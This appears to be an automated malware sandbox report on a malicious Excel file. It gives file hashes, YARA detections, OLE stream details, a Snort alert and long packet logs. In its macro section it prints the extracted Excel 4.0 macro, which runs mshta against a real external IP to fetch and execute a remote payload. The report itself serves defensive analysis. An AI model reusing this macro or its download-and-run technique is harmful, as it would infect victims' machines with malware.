                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                  Malicious:false
                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1T8X5DZLZY7O85LP3LGQ.temp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8016
                                                                                                                  Entropy (8bit):3.581071677225738
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:chQCcMqHkqvsqvJCwoIz8hQCcMqHkqvsEHyqvJCworezIyYHhHjUVhuWlUVqA2:ciJLoIz8iJfHnorezI99UVhuQA2
                                                                                                                  MD5:7C42011AF0DACCEB29F700C458000C2F
                                                                                                                  SHA1:089CA36ABEF9322C25CA368709E19C7B2B48EA3E
                                                                                                                  SHA-256:C629400B7EC30191EE69661C40DF47ECD0DEB2DCD8D540C27A8987CE6AC21E8B
                                                                                                                  SHA-512:6E84C13528D3371646201C99DE7ADFA7807A8FB403DBF40971AC86DB826CB150248AE0E9FA6F526E0944DC0BB68B1320B600F5A6E186E681688423300096B5E2
                                                                                                                  Malicious:false
                                                                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msex (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8016
                                                                                                                  Entropy (8bit):3.581071677225738
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:chQCcMqHkqvsqvJCwoIz8hQCcMqHkqvsEHyqvJCworezIyYHhHjUVhuWlUVqA2:ciJLoIz8iJfHnorezI99UVhuQA2
                                                                                                                  MD5:7C42011AF0DACCEB29F700C458000C2F
                                                                                                                  SHA1:089CA36ABEF9322C25CA368709E19C7B2B48EA3E
                                                                                                                  SHA-256:C629400B7EC30191EE69661C40DF47ECD0DEB2DCD8D540C27A8987CE6AC21E8B
                                                                                                                  SHA-512:6E84C13528D3371646201C99DE7ADFA7807A8FB403DBF40971AC86DB826CB150248AE0E9FA6F526E0944DC0BB68B1320B600F5A6E186E681688423300096B5E2
                                                                                                                  Malicious:false
                                                                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                  C:\Users\user\Desktop\imedpub_6.xls

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):86528
                                                                                                                  Entropy (8bit):7.100278057839206
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3T:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxT
                                                                                                                  MD5:DDDAE242BE9D69182C82ED3AD608CD22
                                                                                                                  SHA1:6A892E72C3BB01203F2C6BF593A45B5BC300E073
                                                                                                                  SHA-256:85F3C947695FA054D71EB4C5EFF5D4D2F164D6D3895A5F4C87428FB3AA1BC1F5
                                                                                                                  SHA-512:90D3E159B367F14F12F144BB7F1F0E6F60EE84BE19A19E8F40545918714325609C44DC95C5203675182401327C6BA433EC8BD79BE43A6A89C6C0EE7C59DB845F
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_6.xls, Author: John Lambert @JohnLaTwC
                                                                                                                  • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_6.xls, Author: Joe Security
                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                                                                                                  C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):548864
                                                                                                                  Entropy (8bit):6.980518796737633
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvNyMwWd3DYr6i64/:OUBPSczbeeTnvhZDWA
                                                                                                                  MD5:8A6FB79B56B4C5F45322AAA8150C5E36
                                                                                                                  SHA1:09453D0478D6725C5ECFBD1644CCC156811F0A6C
                                                                                                                  SHA-256:DCC5DFE8C7150DD55E2F22EEBAE19F04EFAFA214DC7E1366A0CF4CCC7E616119
                                                                                                                  SHA-512:2F06489632ADEA7B67D544B3B0491B78AEE29F3C91B38251445ABA70CAF148EF6A1ADCC4158C1B85DC9F2036F790A2AF9622DDF7F3FF85D67A19B87BC5BA7F4F
                                                                                                                  Malicious:false
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                  Entropy (8bit):7.096975054765422
                                                                                                                  TrID:
                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                  File name:imedpub_6.xls
                                                                                                                  File size:86588
                                                                                                                  MD5:eee4085b8c00a4dbae2459b0f97ebeb7
                                                                                                                  SHA1:c449b3584ff6db4b37c402aa27ed8b6793b5bd74
                                                                                                                  SHA256:b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
                                                                                                                  SHA512:194cc0d0667bf67d71bb2653a523113191a123078451fed8ab74b1924d8b3fce4de18393483da839a876c1efff906100e20894142630837f4ccf980cbc09312e
                                                                                                                  SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:e4eea286a4b4bcb4

                                                                                                                  Static OLE Info

                                                                                                                  General

                                                                                                                  Document Type:OLE
                                                                                                                  Number of OLE Files:1

                                                                                                                  OLE File "imedpub_6.xls"

                                                                                                                  Indicators
                                                                                                                  Has Summary Info:True
                                                                                                                  Application Name:Microsoft Excel
                                                                                                                  Encrypted Document:False
                                                                                                                  Contains Word Document Stream:False
                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                  Contains Visio Document Stream:False
                                                                                                                  Contains ObjectPool Stream:
                                                                                                                  Flash Objects Count:
                                                                                                                  Contains VBA Macros:True
                                                                                                                  Summary
                                                                                                                  Code Page:1251
                                                                                                                  Author:xXx
                                                                                                                  Last Saved By:xXx
                                                                                                                  Create Time:2022-01-27 23:41:00
                                                                                                                  Last Saved Time:2022-01-28 06:31:03
                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                  Security:0
                                                                                                                  Document Summary
                                                                                                                  Document Code Page:1251
                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                  Company:
                                                                                                                  Contains Dirty Links:False
                                                                                                                  Shared Document:False
                                                                                                                  Changed Hyperlinks:False
                                                                                                                  Application Version:1048576

                                                                                                                  Streams

                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                  General
                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                  File Type:data
                                                                                                                  Stream Size:4096
                                                                                                                  Entropy:0.324918127833
                                                                                                                  Base64 Encoded:False
                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00
                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                  General
                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                  File Type:data
                                                                                                                  Stream Size:4096
                                                                                                                  Entropy:0.263079431268
                                                                                                                  Base64 Encoded:False
                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002
                                                                                                                  General
                                                                                                                  Stream Path:Workbook
                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                  Stream Size:76002
                                                                                                                  Entropy:7.62172227998
                                                                                                                  Base64 Encoded:True
                                                                                                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                  Macro 4.0 Code

                                                                                                                  Name:REEEEEEEE
                                                                                                                  Type:3
                                                                                                                  Final:False
                                                                                                                  Visible:False
                                                                                                                  Protected:False
                                                                                                                  REEEEEEEE3False0Falsepost2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()
                                                                                                                  Name:REEEEEEEE
                                                                                                                  Type:3
                                                                                                                  Final:False
                                                                                                                  Visible:False
                                                                                                                  Protected:False
                                                                                                                  REEEEEEEE3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  01/28/22-21:01:38.683580TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.172

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 28, 2022 21:01:33.819127083 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.880640030 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.880728960 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.881614923 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.942898989 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943207026 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943257093 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943295956 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943316936 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943336964 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943346977 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943350077 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943380117 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943386078 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943420887 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943444967 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943460941 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943463087 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943504095 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.943505049 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943540096 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943568945 CET804916791.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:33.943671942 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:33.972279072 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:38.618396044 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:38.679992914 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:38.680088997 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:38.683579922 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:38.745055914 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:38.745675087 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:38.745712042 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:38.745856047 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:38.842412949 CET4916980192.168.2.22164.90.147.135
                                                                                                                  Jan 28, 2022 21:01:41.856457949 CET4916980192.168.2.22164.90.147.135
                                                                                                                  Jan 28, 2022 21:01:44.086548090 CET4916780192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:01:47.863270044 CET4916980192.168.2.22164.90.147.135
                                                                                                                  Jan 28, 2022 21:02:00.002283096 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.181339979 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.181447983 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.181602955 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.360706091 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370345116 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370373011 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370387077 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370400906 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370413065 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370424986 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370441914 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370454073 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370465040 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370480061 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.370712042 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.549765110 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549796104 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549807072 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549823999 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549839973 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549882889 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549899101 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549911022 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549923897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549941063 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549957037 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.549984932 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550002098 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550019026 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550035000 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550040960 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.550051928 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550067902 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550076962 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.550082922 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.550085068 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550096989 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550110102 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.550131083 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.550170898 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729242086 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729274035 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729293108 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729310036 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729326010 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729342937 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729356050 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729368925 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729383945 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729401112 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729406118 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729417086 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729433060 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729449987 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729455948 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729469061 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729485035 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729490042 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729501963 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729517937 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729536057 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729551077 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729552031 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729568005 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729583025 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729585886 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729619980 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729630947 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729646921 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729662895 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729679108 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729686975 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729708910 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729718924 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729723930 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729752064 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729759932 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729775906 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729792118 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729819059 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729824066 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729835987 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729876995 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729893923 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729908943 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.729909897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729923964 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729937077 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729948997 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729960918 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.729984999 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.730071068 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.730520010 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.908852100 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.908911943 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.908951998 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.908972979 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.908992052 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.909030914 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.909044027 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.909070015 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.909110069 CET8049170103.206.244.105192.168.2.22
